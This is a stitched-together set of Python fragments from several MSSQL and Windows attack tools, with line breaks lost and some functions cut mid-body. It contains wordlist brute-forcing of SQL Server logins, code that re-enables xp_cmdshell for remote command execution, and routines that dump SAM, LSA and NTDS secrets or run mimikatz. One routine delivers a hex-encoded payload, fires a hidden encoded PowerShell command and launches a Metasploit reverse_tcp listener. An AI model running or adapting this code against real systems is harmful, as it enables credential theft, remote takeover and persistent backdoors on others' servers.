def crack_in_linux(address, username, password): ''' 中文提示:用户 'sa' 登录失败。 英文提示:Login failed for user 经过测试在linux下成功 window7下报错:struct.error: ('unpack requires a string argument of length 1', "When unpacking field 'Type | <B | ''[:1]'") ''' host = h.getPath(address) port = h.getPort(address) if h.getPort(address) != None else 1433 fp = tds.MSSQL(host, int(port)) fp.connect() r = fp.login(None, username, password, None, None, False) # 第二种登录方式:r = fp.login(None, username, password, domain, password_hash, True) if not r: key = fp.replies[TDS_ERROR_TOKEN][0] code = key['Number'] mesg = key['MsgText'].decode('utf-16le') else: key = fp.replies[TDS_LOGINACK_TOKEN][0] code = '0' mesg = '%s (%d%d %d%d)' % (key['ProgName'].decode('utf-16le'), key['MajorVer'], key['MinorVer'], key['BuildNumHi'], key['BuildNumLow']) fp.disconnect() code = int(code) if code == 0: return True, mesg elif code == 18456: return False, mesg else: return False, mesg
def cmdshell(ipaddr, port, username, password, option): # connect to SQL server mssql = tds.MSSQL(ipaddr, int(port)) mssql.connect() mssql.login("master", username, password) core.print_status("Connection established with SQL Server...") core.print_status("Attempting to re-enable xp_cmdshell if disabled...") try: mssql.sql_query( "exec master.dbo.sp_configure 'show advanced options',1;" "RECONFIGURE;" "exec master.dbo.sp_configure 'xp_cmdshell', 1;" "RECONFIGURE;") except: pass core.print_status( "Enter your Windows Shell commands in the xp_cmdshell - prompt...") while True: # prompt mssql cmd = input("mssql>") # if we want to exit if cmd == "quit" or cmd == "exit": break # if the command isnt empty elif cmd: # execute the command mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd)) # print the rest of the data mssql.printReplies() mssql.colMeta[0]['TypeData'] = 80 * 2 mssql.printRows()
def brute(ipaddr, username, port, wordlist): # if ipaddr being passed is invalid if ipaddr == "": return False if ipaddr != "": # base counter for successful brute force counter = 0 # build in quick wordlist if wordlist == "default": wordlist = "src/fasttrack/wordlist.txt" # read in the file password = file(wordlist, "r") for passwords in password: passwords = passwords.rstrip() # try actual password try: ipaddr = str(ipaddr) print "Attempting to brute force " + bcolors.BOLD + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC # connect to the sql server and attempt a password if ":" in ipaddr: #target_server = _mssql.connect(ipaddr, username, passwords) ipaddr = ipaddr.split(":") port = ipaddr[1] ipaddr = ipaddr[0] #target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords) sql_server = tds.MSSQL(str(ipaddr), int(port)) # print that we were successful sql_server.connect() #target_server = False target_server = sql_server.login("master", username, passwords) if target_server: print_status( "\nSuccessful login with username %s and password: %s" % (username, passwords)) counter = 1 break # if login failed or unavailable server except Exception, e: pass # if we brute forced a machine if counter == 1: if ":" in ipaddr: ipaddr = ipaddr.split(":") ipaddr = ipaddr[0] return ipaddr + "," + username + "," + str(port) + "," + passwords # else we didnt and we need to return a false else: if ipaddr != '': print_warning( "Unable to guess the SQL password for %s with username of %s" % (ipaddr, username)) return False
def _check_connection(self): try: ms_sql = tds.MSSQL(str(self.target), self.port) ms_sql.connect() return ms_sql except Exception, e: self.logger.debug('[check_success] error: %s' % str(e)) return False
def mssql_brute(host, user, pwd, port=1433, windows_auth='0', domain='', password_hash=None): """ :param host: param user: :param pwd: param port: (Default value = '1433') :param windows_auth: Default value = '0') :param domain: Default value = '') :param password_hast: Default value = None) :param user: param port: (Default value = '1433') :param port: Default value = '1433') """ try: MSSQL_CONN = tds.MSSQL(host, port) MSSQL_CONN.connect() if windows_auth == '0': r = MSSQL_CONN.login(None, user, pwd, None, None, False) else: r = MSSQL_CONN.login(None, user, pwd, domain, password_hash, True) MSSQL_CONN.disconnect() _ret_auth = windows_auth if windows_auth != '0' else '' _ret_password_hash = password_hash if password_hash else '' if r: logger.success( f'mssql success {user}:{pwd}@{host}:{str(port)} ssh ') return { "user": user, "password": pwd, "ip": host, "serviceName": "mssql", "port": port, "detail": { "domain": domain, "windows_auth": _ret_auth, "password_hash": _ret_password_hash } } """ 我都不知道我之前写这干嘛的。。。。 if not r: key = MSSQL_CONN.replies[TDS_ERROR_TOKEN][0] code = key['number'] mesg = key['MsgText'].decode('utf-16le') else: key = MSSQL_CONN.replies[TDS_LOGINACK_TOKEN][0] code = '0' mesg = '%s (%d%d %d%d)' % (key['ProgName'].decode('utf-16le'), key['MajorVer'], key['MinorVer'], key['BuildNumHi'], key['BuildNumLow']) """ except Exception as e: logger.info(f"{e.args}") return
def login(self, addr, port, user, pwd): self.sql = tds.MSSQL(addr, int(port)) self.sql.connect() try: # login(self, database, username, password='', domain='', # hashes = None, useWindowsAuth = False) self.sql.login(None, user, pwd, '', None, False) except e: logging.debug("Exception:", exc_info=True) logging.error(str(e))
def __connect(self): self.sql = tds.MSSQL(self.address, int(self.port)) self.sql.connect() login = self.sql.login(self.db, self.username, self.password, self.domain, self.hashes, False) if login: self.sql.sql_query("Select @@Version") self.sql.printReplies() self.sql.printRows() return login
def connect_mssql(ip, port=1433, username="******", password="", domain=""): # do database connection (simple for now) ms_sql = tds.MSSQL(ip, port) ms_sql.connect() res = ms_sql.login(database = None, username=username, password=password, domain=domain) ms_sql.printReplies() if res: return XpShell(ms_sql) else: return res
def cmdshell(ipaddr, port, username, password, option): # connect to SQL server mssql = tds.MSSQL(ipaddr, int(port)) mssql.connect() mssql.login("master", username, password) print_status("Connection established with SQL Server...") print_status("Attempting to re-enable xp_cmdshell if disabled...") try: mssql.sql_query( "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;" ) except Exception, e: pass
def mssql_greenlet(host, server_name, domain): cme_logger = CMEAdapter( logging.getLogger('CME'), { 'host': host, 'hostname': server_name, 'port': settings.args.mssql_port, 'service': 'MSSQL' }) try: ms_sql = tds.MSSQL(host, int(settings.args.mssql_port), cme_logger) ms_sql.connect() except socket.error as e: if settings.args.verbose: print_error(str(e)) return if settings.args.mssql_instance: instances = ms_sql.getInstances(5) if len(instances) == 0: cme_logger.info("No MSSQL Instances found") else: cme_logger.success("Enumerating MSSQL instances") for i, instance in enumerate(instances): cme_logger.results("Instance {}".format(i)) for key in instance.keys(): cme_logger.results(key + ":" + instance[key]) if settings.args.mssql is not None: ms_sql, user, passwd, ntlm_hash, domain = smart_login( host, domain, ms_sql, cme_logger) sql_shell = SQLSHELL(ms_sql, cme_logger) if settings.args.mssql != '': sql_shell.onecmd(settings.args.mssql) if settings.args.enable_xpcmdshell: sql_shell.onecmd('enable_xp_cmdshell') if settings.args.disable_xpcmdshell: sql_shell.onecmd('disable_xp_cmdshell') if settings.args.xp_cmd: sql_shell.onecmd("xp_cmdshell {}".format(settings.args.xp_cmd)) ms_sql.disconnect()
def check_creds(server, username, password, domain='', db='', port=1433, kerberos=True): has_access = False try: ms_sql = tds.MSSQL(server, port) ms_sql.connect() if kerberos is True: ms_sql.kerberosLogin(db, username, password, domain) else: ms_sql.login(db, username, password, domain) ms_sql.disconnect() has_access = True except: has_access = False return has_access
def main_greenlet(host): try: smb = SMBConnection(host, host, None, settings.args.port) #Get our IP from the socket local_ip = smb.getSMBServer().get_socket().getsockname()[0] try: smb.login('', '') except SessionError as e: if "STATUS_ACCESS_DENIED" in e.message: pass domain = settings.args.domain s_name = smb.getServerName() if not domain: domain = smb.getServerDomain() if not domain: domain = s_name cme_logger = CMEAdapter( logging.getLogger('CME'), { 'host': host, 'hostname': s_name, 'port': settings.args.port, 'service': 'SMB' }) cme_logger.info(u"{} (name:{}) (domain:{})".format( smb.getServerOS(), s_name, domain)) try: ''' DC's seem to want us to logoff first Windows workstations sometimes reset the connection, so we handle both cases here (go home Windows, you're drunk) ''' smb.logoff() except NetBIOSError: pass except socket.error: pass if settings.args.mssql: cme_logger = CMEAdapter( logging.getLogger('CME'), { 'host': host, 'hostname': s_name, 'port': settings.args.mssql_port, 'service': 'MSSQL' }) #try: ms_sql = tds.MSSQL(host, int(settings.args.mssql_port), cme_logger) ms_sql.connect() instances = ms_sql.getInstances(5) cme_logger.info("Found {} MSSQL instance(s)".format( len(instances))) for i, instance in enumerate(instances): cme_logger.results("Instance {}".format(i)) for key in instance.keys(): cme_logger.results(key + ":" + instance[key]) try: ms_sql.disconnect() except: pass #except socket.error as e: # if settings.args.verbose: mssql_cme_logger.error(str(e)) if (settings.args.user and (settings.args.passwd or settings.args.hash)) or settings.args.combo_file: ms_sql = None smb = None if settings.args.mssql: ms_sql = tds.MSSQL(host, int(settings.args.mssql_port), cme_logger) ms_sql.connect() ms_sql, user, passwd, ntlm_hash, domain = smart_login( host, domain, ms_sql, cme_logger) sql_shell = SQLSHELL(ms_sql, cme_logger) else: smb = SMBConnection(host, host, None, settings.args.port) smb, user, passwd, ntlm_hash, domain = smart_login( host, domain, smb, cme_logger) if ms_sql: connection = ms_sql if settings.args.mssql_query: sql_shell.onecmd(settings.args.mssql_query) if smb: connection = smb if settings.args.delete or settings.args.download or settings.args.list or settings.args.upload: rfs = RemoteFileSystem(host, smb, cme_logger) if settings.args.delete: rfs.delete() if settings.args.download: rfs.download() if settings.args.upload: rfs.upload() if settings.args.list: rfs.list() if settings.args.enum_shares: shares = SHAREDUMP(smb, cme_logger) shares.dump(host) if settings.args.enum_users: users = SAMRDump(cme_logger, '{}/SMB'.format(settings.args.port), user, passwd, domain, ntlm_hash, settings.args.aesKey, settings.args.kerb) users.dump(host) if settings.args.sam or settings.args.lsa or settings.args.ntds: dumper = DumpSecrets(cme_logger, 'logs/{}'.format(host), smb, settings.args.kerb) dumper.do_remote_ops() if settings.args.sam: dumper.dump_SAM() if settings.args.lsa: dumper.dump_LSA() if settings.args.ntds: dumper.dump_NTDS(settings.args.ntds, settings.args.ntds_history, settings.args.ntds_pwdLastSet) dumper.cleanup() if settings.args.pass_pol: pass_pol = PassPolDump(cme_logger, '{}/SMB'.format(settings.args.port), user, passwd, domain, ntlm_hash, settings.args.aesKey, settings.args.kerb) pass_pol.dump(host) if settings.args.rid_brute: lookup = LSALookupSid(cme_logger, user, passwd, domain, '{}/SMB'.format(settings.args.port), ntlm_hash, settings.args.rid_brute) lookup.dump(host) if settings.args.enum_sessions or settings.args.enum_disks or settings.args.enum_lusers: rpc_query = RPCQUERY(cme_logger, user, passwd, domain, ntlm_hash) if settings.args.enum_sessions: rpc_query.enum_sessions(host) if settings.args.enum_disks: rpc_query.enum_disks(host) if settings.args.enum_lusers: rpc_query.enum_lusers(host) if settings.args.spider: smb_spider = SMBSPIDER(cme_logger, host, smb) smb_spider.spider(settings.args.spider, settings.args.depth) smb_spider.finish() if settings.args.wmi_query: wmi_query = WMIQUERY(cme_logger, user, domain, passwd, ntlm_hash, settings.args.kerb, settings.args.aesKey) wmi_query.run(settings.args.wmi_query, host, settings.args.namespace) if settings.args.check_uac: uac = UACdump(cme_logger, smb, settings.args.kerb) uac.run() if settings.args.enable_wdigest or settings.args.disable_wdigest: wdigest = WdisgestEnable(cme_logger, smb, settings.args.kerb) if settings.args.enable_wdigest: wdigest.enable() elif settings.args.disable_wdigest: wdigest.disable() if settings.args.service: service_control = SVCCTL( cme_logger, user, passwd, domain, '{}/SMB'.format(settings.args.port), settings.args.service, settings.args.aesKey, settings.args.kerb, ntlm_hash, settings.args) service_control.run(host) if settings.args.command: EXECUTOR(cme_logger, settings.args.command, host, domain, settings.args.no_output, connection, settings.args.execm, user, passwd, ntlm_hash) if settings.args.pscommand: EXECUTOR( cme_logger, ps_command(settings.args.pscommand, settings.args.ps_arch), host, domain, settings.args.no_output, connection, settings.args.execm, user, passwd, ntlm_hash) if settings.args.mimikatz: powah_command = PowerShell(settings.args.server, local_ip) EXECUTOR(cme_logger, powah_command.mimikatz(), host, domain, True, connection, settings.args.execm, user, passwd, ntlm_hash) if settings.args.gpp_passwords: powah_command = PowerShell(settings.args.server, local_ip) EXECUTOR(cme_logger, powah_command.gpp_passwords(), host, domain, True, connection, settings.args.execm, user, passwd, ntlm_hash) if settings.args.mimikatz_cmd: powah_command = PowerShell(settings.args.server, local_ip) EXECUTOR(cme_logger, powah_command.mimikatz(settings.args.mimikatz_cmd), host, domain, True, connection, settings.args.execm, user, passwd, ntlm_hash) if settings.args.powerview: #For some reason powerview functions only seem to work when using smbexec... #I think we might have a mistery on our hands boys and girls! powah_command = PowerShell(settings.args.server, local_ip) EXECUTOR(cme_logger, powah_command.powerview(settings.args.powerview), host, domain, True, connection, 'smbexec', user, passwd, ntlm_hash) if settings.args.tokens: powah_command = PowerShell(settings.args.server, local_ip) EXECUTOR(cme_logger, powah_command.token_enum(), host, domain, True, connection, settings.args.execm, user, passwd, ntlm_hash) if settings.args.inject: powah_command = PowerShell(settings.args.server, local_ip) if settings.args.inject.startswith('met_'): EXECUTOR(cme_logger, powah_command.inject_meterpreter(), host, domain, True, connection, settings.args.execm, user, passwd, ntlm_hash) if settings.args.inject == 'shellcode': EXECUTOR(cme_logger, powah_command.inject_shellcode(), host, domain, True, connection, settings.args.execm, user, passwd, ntlm_hash) if settings.args.inject == 'dll' or settings.args.inject == 'exe': EXECUTOR(cme_logger, powah_command.inject_exe_dll(), host, domain, True, connection, settings.args.execm, user, passwd, ntlm_hash) try: smb.logoff() except: pass try: ms_sql.disconnect() except: pass except SessionError as e: print_error("{}:{} {}".format(host, settings.args.port, e)) if settings.args.verbose: traceback.print_exc() except NetBIOSError as e: print_error("{}:{} NetBIOS Error: {}".format(host, settings.args.port, e)) if settings.args.verbose: traceback.print_exc() except DCERPCException as e: print_error("{}:{} DCERPC Error: {}".format(host, settings.args.port, e)) if settings.args.verbose: traceback.print_exc() except socket.error as e: if settings.args.verbose: print_error(str(e)) return
def connector(target, args, db, module, context, cmeserver): try: smb = SMBConnection(target, target, None, args.smb_port) #Get our IP from the socket local_ip = smb.getSMBServer().get_socket().getsockname()[0] #Get the remote ip address (in case the target is a hostname) remote_ip = smb.getRemoteHost() try: smb.login('' , '') except SessionError as e: if "STATUS_ACCESS_DENIED" in e.message: pass domain = smb.getServerDomain() servername = smb.getServerName() serveros = smb.getServerOS() if not domain: domain = servername db.add_host(remote_ip, servername, domain, serveros) logger = CMEAdapter(getLogger('CME'), {'host': remote_ip, 'port': args.smb_port, 'hostname': u'{}'.format(servername)}) logger.info(u"{} (name:{}) (domain:{})".format(serveros, servername.decode('utf-8'), domain.decode('utf-8'))) try: ''' DC's seem to want us to logoff first Windows workstations sometimes reset the connection, so we handle both cases here (go home Windows, you're drunk) ''' smb.logoff() except NetBIOSError: pass except socket.error: pass if args.mssql: instances = None logger.extra['port'] = args.mssql_port ms_sql = tds.MSSQL(target, args.mssql_port, logger) ms_sql.connect() instances = ms_sql.getInstances(10) if len(instances) > 0: logger.info("Found {} MSSQL instance(s)".format(len(instances))) for i, instance in enumerate(instances): logger.highlight("Instance {}".format(i)) for key in instance.keys(): logger.highlight(key + ":" + instance[key]) try: ms_sql.disconnect() except: pass if args.username and (args.password or args.hash): conn = None if args.mssql and (instances is not None and len(instances) > 0): conn = tds.MSSQL(target, args.mssql_port, logger) conn.connect() elif not args.mssql: conn = SMBConnection(target, target, None, args.smb_port) if conn is None: return if args.domain: domain = args.domain connection = Connection(args, db, target, servername, domain, conn, logger, cmeserver) if (connection.password is not None or connection.hash is not None) and connection.username is not None: if module is not None: module_logger = CMEAdapter(getLogger('CME'), {'module': module.name.upper(), 'host': remote_ip, 'port': args.smb_port, 'hostname': servername}) context = Context(db, module_logger, args) context.localip = local_ip if hasattr(module, 'on_request') or hasattr(module, 'has_response'): cmeserver.server.context.localip = local_ip if hasattr(module, 'on_login'): module.on_login(context, connection) if hasattr(module, 'on_admin_login') and connection.admin_privs: module.on_admin_login(context, connection) else: if connection.admin_privs and (args.pscommand or args.command): get_output = True if args.no_output is False else False if args.mssql: args.exec_method = 'mssqlexec' if args.command: output = connection.execute(args.command, get_output=get_output) if args.pscommand: output = connection.execute(create_ps_command(args.pscommand), get_output=get_output) logger.success('Executed command {}'.format('via {}'.format(args.exec_method) if args.exec_method else '')) buf = StringIO(output).readlines() for line in buf: logger.highlight(line.strip()) if args.mssql and args.mssql_query: conn.sql_query(args.mssql_query) query_output = conn.printRows() logger.success('Executed MSSQL query') buf = StringIO(query_output).readlines() for line in buf: logger.highlight(line.strip()) elif not args.mssql: if connection.admin_privs and (args.sam or args.lsa or args.ntds): secrets_dump = DumpSecrets(connection, logger) if args.sam: secrets_dump.SAM_dump() if args.lsa: secrets_dump.LSA_dump() if args.ntds: secrets_dump.NTDS_dump(args.ntds, args.ntds_pwdLastSet, args.ntds_history) if connection.admin_privs and args.wdigest: w_digest = WDIGEST(logger, connection.conn) if args.wdigest == 'enable': w_digest.enable() elif args.wdigest == 'disable': w_digest.disable() if connection.admin_privs and args.uac: UAC(connection.conn, logger).enum() if args.spider: spider = SMBSpider(logger, connection, args) spider.spider(args.spider, args.depth) spider.finish() if args.enum_shares: ShareEnum(connection.conn, logger).enum() if args.enum_lusers or args.enum_disks or args.enum_sessions: rpc_connection = RPCQUERY(connection, logger) if args.enum_lusers: rpc_connection.enum_lusers() if args.enum_sessions: rpc_connection.enum_sessions() if args.enum_disks: rpc_connection.enum_disks() if args.pass_pol: PassPolDump(logger, args.smb_port, connection).enum() if args.enum_users: SAMRDump(logger, args.smb_port, connection).enum() if connection.admin_privs and args.wmi_query: WMIQUERY(logger, connection, args.wmi_namespace).query(args.wmi_query) if args.rid_brute: LSALookupSid(logger, args.smb_port, connection, args.rid_brute).brute_force() except socket.error: return
#In case the password contains '@' if '@' in address: password = password + '@' + address.rpartition('@')[0] address = address.rpartition('@')[2] if domain is None: domain = '' if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: from getpass import getpass password = getpass("Password:") if options.aesKey is not None: options.k = True ms_sql = tds.MSSQL(address, int(options.port)) ms_sql.connect() try: if options.k is True: res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey, kdcHost=options.dc_ip) else: res = ms_sql.login(options.db, username, password, domain, options.hashes, options.windows_auth) ms_sql.printReplies() except Exception as e:
print(version.BANNER) # Init the example's logger theme logger.init() parser = argparse.ArgumentParser( add_help=True, description="Asks the remote host for its running MSSQL Instances.") parser.add_argument('host', action='store', help='target host') parser.add_argument('-timeout', action='store', default='5', help='timeout to wait for an answer') if len(sys.argv) == 1: parser.print_help() sys.exit(1) options = parser.parse_args() ms_sql = tds.MSSQL(options.host) instances = ms_sql.getInstances(int(options.timeout)) if len(instances) == 0: "No MSSQL Instances found" else: for i, instance in enumerate(instances): logging.info("Instance %d" % i) for key in list(instance.keys()): print(key + ":" + instance[key])
def __init__(self, args, db, host, module, cmeserver): self.args = args self.db = db self.host = host self.module = module self.cmeserver = cmeserver self.conn = None self.hostname = None self.domain = None self.server_os = None self.logger = None self.password = None self.username = None self.hash = None self.admin_privs = False self.failed_logins = 0 try: smb = SMBConnection(self.host, self.host, None, self.args.smb_port) #Get our IP from the socket local_ip = smb.getSMBServer().get_socket().getsockname()[0] #Get the remote ip address (in case the target is a hostname) remote_ip = smb.getRemoteHost() try: smb.login('' , '') except SessionError as e: if "STATUS_ACCESS_DENIED" in e.message: pass self.host = remote_ip self.domain = smb.getServerDomain() self.hostname = smb.getServerName() self.server_os = smb.getServerOS() if not self.domain: self.domain = self.hostname self.db.add_host(self.host, self.hostname, self.domain, self.server_os) self.logger = CMEAdapter(getLogger('CME'), { 'host': self.host, 'port': self.args.smb_port, 'hostname': u'{}'.format(self.hostname) }) self.logger.info(u"{} (name:{}) (domain:{})".format( self.server_os, self.hostname.decode('utf-8'), self.domain.decode('utf-8') )) try: ''' DC's seem to want us to logoff first, windows workstations sometimes reset the connection (go home Windows, you're drunk) ''' smb.logoff() except: pass if self.args.mssql: instances = None self.logger.extra['port'] = self.args.mssql_port mssql = tds.MSSQL(self.host, self.args.mssql_port, self.logger) mssql.connect() instances = mssql.getInstances(10) if len(instances) > 0: self.logger.info("Found {} MSSQL instance(s)".format(len(instances))) for i, instance in enumerate(instances): self.logger.highlight("Instance {}".format(i)) for key in instance.keys(): self.logger.highlight(key + ":" + instance[key]) try: mssql.disconnect() except: pass if (self.args.username and (self.args.password or self.args.hash)) or self.args.cred_id: if self.args.mssql and (instances is not None and len(instances) > 0): self.conn = tds.MSSQL(self.host, self.args.mssql_port, self.logger) self.conn.connect() elif not args.mssql: self.conn = SMBConnection(self.host, self.host, None, self.args.smb_port) except socket.error: pass if self.conn: if self.args.domain: self.domain = self.args.domain if self.args.local_auth: self.domain = self.hostname self.login() if ((self.password is not None or self.hash is not None) and self.username is not None): if self.module: module_logger = CMEAdapter(getLogger('CME'), { 'module': module.name.upper(), 'host': self.host, 'port': self.args.smb_port, 'hostname': self.hostname }) context = Context(self.db, module_logger, self.args) context.localip = local_ip if hasattr(module, 'on_request') or hasattr(module, 'has_response'): cmeserver.server.context.localip = local_ip if hasattr(module, 'on_login'): module.on_login(context, self) if hasattr(module, 'on_admin_login') and self.admin_privs: module.on_admin_login(context, self) elif self.module is None: for k, v in vars(self.args).iteritems(): if hasattr(self, k) and hasattr(getattr(self, k), '__call__'): if v is not False and v is not None: getattr(self, k)()
sys.exit(1) options = parser.parse_args() import re domain, username, password, address = re.compile( '(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( options.target).groups('') if domain is None: domain = '' if options.windows_auth == 'True': win_auth = True else: win_auth = False ms_sql = tds.MSSQL(address, string.atoi(options.port)) ms_sql.connect() res = ms_sql.login(options.db, username, password, domain, options.hashes, win_auth) ms_sql.printReplies() if res == True: shell = SQLSHELL(ms_sql) if options.file is None: shell.cmdloop() else: for line in options.file.readlines(): print "SQL> %s" % line, shell.onecmd(line) ms_sql.disconnect()
def deploy_hex2binary(ipaddr, port, username, password): mssql = tds.MSSQL(ipaddr, int(port)) mssql.connect() mssql.login("master", username, password) print_status("Enabling the xp_cmdshell stored procedure...") mssql.sql_query( "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;" ) print_status("Checking if powershell is installed on the system...") # just throw a simple command via powershell to get the output mssql.sql_query("exec master..xp_cmdshell 'powershell -Version'") bundle = str(capture(mssql.printRows)) # remove null byte terminators from capture output bundle = bundle.replace("\\x00", "") # search for parameter version - standard output for powershell -Version command match = re.search("parameter version", bundle) # if we have a match we have powershell installed if match: print_status( "Powershell was identified, targeting server through powershell injection." ) option = "1" # otherwise, fall back to the older version using debug conversion via hex else: print_status( "Powershell not detected, attempting Windows debug method.") option = "2" # if we don't have powershell if option == "2": try: reload(src.core.payloadgen.create_payloads) except: import src.core.payloadgen.create_payloads print_status("Connection established with SQL Server...") print_status("Converting payload to hexadecimal...") # if we are using a SET interactive shell payload then we need to make the path under web_clone versus ~./set if os.path.isfile(setdir + "/set.payload"): web_path = (setdir + "/web_clone/") # then we are using metasploit if not os.path.isfile(setdir + "/set.payload"): if operating_system == "posix": web_path = (setdir) subprocess.Popen( "cp %s/msf.exe %s/ 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() subprocess.Popen( "cp %s//msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() fileopen = file("%s/msf.exe" % (web_path), "rb") # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file filewrite = file(setdir + "/payload.hex", "w") filewrite.write(data) filewrite.close() # if we are using metasploit, start the listener if not os.path.isfile(setdir + "/set.payload"): if operating_system == "posix": try: reload(pexpect) except: import pexpect print_status("Starting the Metasploit listener...") msf_path = meta_path() child2 = pexpect.spawn("%s/msfconsole -r %s/meta_config" % (msf_path, setdir)) # random executable name random_exe = generate_random_string(10, 15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": print_status( "Checking what type of operating system either x86 or x64") mssql.sql_query( "exec master..xp_cmdshell 'systeminfo | find /I \"System type\"'") bundle = str(capture(mssql.printRows)) match = re.search("X86", bundle) if match: print_status( "Windows X86 architecture detected. Selecting powershell injection." ) payload = "x86" else: print_status( "Windows X64 architecture detected. Selecting powershell injection." ) payload = "x64" # specify ipaddress of reverse listener ipaddr = grab_ipaddress() update_options("IPADDR=" + ipaddr) port = raw_input( setprompt(["29"], "Enter the port for the reverse [443]")) if port == "": port = "443" update_options("PORT=" + port) update_options("POWERSHELL_SOLO=ON") print_status( "Prepping the payload for delivery and injecting alphanumeric shellcode..." ) try: reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep # create the directory if it does not exist if not os.path.isdir(setdir + "/reports/powershell"): os.makedirs(setdir + "/reports/powershell") # here we format everything for us x64 = file(setdir + "/x64.powershell", "r") x64 = x64.read() x64 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x64 x86 = file(setdir + "/x86.powershell", "r") x86 = x86.read() x86 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x86 print_status( "If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) filewrite = file( setdir + "/reports/powershell/x64_powershell_injection.txt", "w") filewrite.write(x64) filewrite.close() filewrite = file( setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) # if our payload is x86 based - need to prep msfconsole rc if payload == "x86": powershell_command = x86 powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt" filewrite = file(setdir + "/reports/powershell/powershell.rc", "w") filewrite.write( "use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port)) filewrite.close() # if our payload ix x64 based - need to prep msfconsole rc if payload == "x64": powershell_command = x64 powershell_dir = setdir + "/reports/powershell/x64_powershell_injection.txt" filewrite = file(setdir + "/reports/powershell/powershell.rc", "w") filewrite.write( "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port)) filewrite.close() # grab the metasploit path from config or smart detection msf_path = meta_path() if operating_system == "posix": try: reload(pexpect) except: import pexpect print_status("Starting the Metasploit listener...") child2 = pexpect.spawn( "%s/msfconsole -r %s/reports/powershell/powershell.rc" % (msf_path, setdir)) # assign random_exe command to the powershell command random_exe = powershell_command # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": # we selected hex to binary fileopen = file("src/payloads/hex2binary.payload", "r") # specify random filename for deployment print_status("Deploying initial debug stager to the system.") random_file = generate_random_string(10, 15) for line in fileopen: # remove bogus chars line = line.rstrip() # make it printer friendly to screen print_line = line.replace("echo e", "") print_status("Deploying stager payload (hex): " + bcolors.BOLD + str(print_line) + bcolors.ENDC) mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" % (line, random_file)) print_status("Converting the stager to a binary...") # here we convert it to a binary mssql.sql_query("exec master..xp_cmdshell 'debug<%s'" % (random_file)) print_status("Conversion complete. Cleaning up...") # delete the random file mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_file)) # here we start the conversion and execute the payload print_status( "Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time fileopen = file(setdir + "/payload.hex", "r") while fileopen: data = fileopen.read(900).rstrip() # if data is done then break out of loop because file is over if data == "": break print_status("Deploying payload to victim machine (hex): " + bcolors.BOLD + str(data) + bcolors.ENDC + "\n") mssql.sql_query("exec master..xp_cmdshell 'echo %s>> %s'" % (data, random_exe)) print_status( "Delivery complete. Converting hex back to binary format.") mssql.sql_query("exec master..xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file)) mssql.sql_query("exec master..xp_cmdshell '%s %s'" % (random_file, random_exe)) # clean up the old files print_status("Cleaning up old files..") mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_exe)) # if we are using SET payload if os.path.isfile(setdir + "/set.payload"): print_status("Spawning seperate child process for listener...") try: shutil.copyfile(setdir + "/web_clone/x", definepath) except: pass # start a threaded webserver in the background subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True) # grab the port options if check_options("PORT=") != 0: port = check_options("PORT=") # if for some reason the port didnt get created we default to 443 else: port = "443" # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified try: reload(thread) except: import thread # execute the payload # we append more commands if option 1 is used if option == "1": print_status("Trigger the powershell injection payload.. ") mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command)) if option == "2": sql_command = ("xp_cmdshell '%s'" % (random_exe)) # start thread of SQL command that executes payload thread.start_new_thread(mssql.sql_query, (sql_command, )) time.sleep(1) # pause to let metasploit launch - real slow systems may need to adjust # i need to rewrite this to do a child.expect on msf and wait until that happens print_status("Pausing 15 seconds to let the system catch up...") time.sleep(15) print_status("Triggering payload stager...") # if pexpect doesnt exit right then it freaks out if os.path.isfile(setdir + "/set.payload"): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect child2.interact() try: os.remove("x") except: pass except: pass